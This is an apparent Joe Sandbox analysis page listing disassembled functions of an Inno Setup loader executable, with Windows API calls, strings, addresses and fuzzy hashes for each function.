Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$HandleModulePolicyProcess
String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
API String ID: 3256987805-3653653586
Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

Function 0040A0E7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32 ref: 0040A0F4

Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,020E7C64), ref: 0040966C

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
SetWindowLongA.USER32(000103C0,000000FC,00409918), ref: 0040A148
RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
73EA5CF0.USER32(000103C0,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248

Strings

/SL5="$%x,%d,%d,, xrefs: 0040A188
InnoSetupLdrWindow, xrefs: 0040A125
STATIC, xrefs: 0040A12A

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLastWindow$CreateDirectoryLongRemove
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3341979996-3001827809
Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D

Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4

Strings

Wow64DisableWow64FsRedirection, xrefs: 004090BA
kernel32.dll, xrefs: 004090BF, 004090D9
Wow64RevertWow64FsRedirection, xrefs: 004090D4
shell32.dll, xrefs: 00409110

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D

Function 0040A0D5 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
SetWindowLongA.USER32(000103C0,000000FC,00409918), ref: 0040A148

Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94

Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E7C64,00409A90,00000000,00409A77), ref: 00409A14
Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E7C64,00409A90,00000000), ref: 00409A28
Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E7C64,00409A90), ref: 00409A5C

RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
73EA5CF0.USER32(000103C0,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248

Strings

/SL5="$%x,%d,%d,, xrefs: 0040A188
InnoSetupLdrWindow, xrefs: 0040A125
STATIC, xrefs: 0040A12A

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 978128352-3001827809
Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D

Function 004099A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E7C64,00409A90,00000000,00409A77), ref: 00409A14
CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E7C64,00409A90,00000000), ref: 00409A28
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E7C64,00409A90), ref: 00409A5C

Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,020E7C64), ref: 0040966C

Strings

D, xrefs: 004099EE

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69

Function 00409E47 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB

Strings

y@, xrefs: 00409FB4
.tmp, xrefs: 00409EF1

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Message
String ID: .tmp$y@
API String ID: 2030045667-2396523267
Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD

Function 00409E62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB

Strings

y@, xrefs: 00409FB4
.tmp, xrefs: 00409EF1

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Message
String ID: .tmp$y@
API String ID: 2030045667-2396523267
Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D

Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F

Strings

.tmp, xrefs: 0040935F

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5

Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32(00008000), ref: 00406FAA
LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766

Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

Function 00405270 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F

Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9

Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98

Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8

Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8

Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428

Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3366841293.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3366921215.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3367063646.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676

Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3

Memory Dump Source

Source File: 00000000.00000002.3366892156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

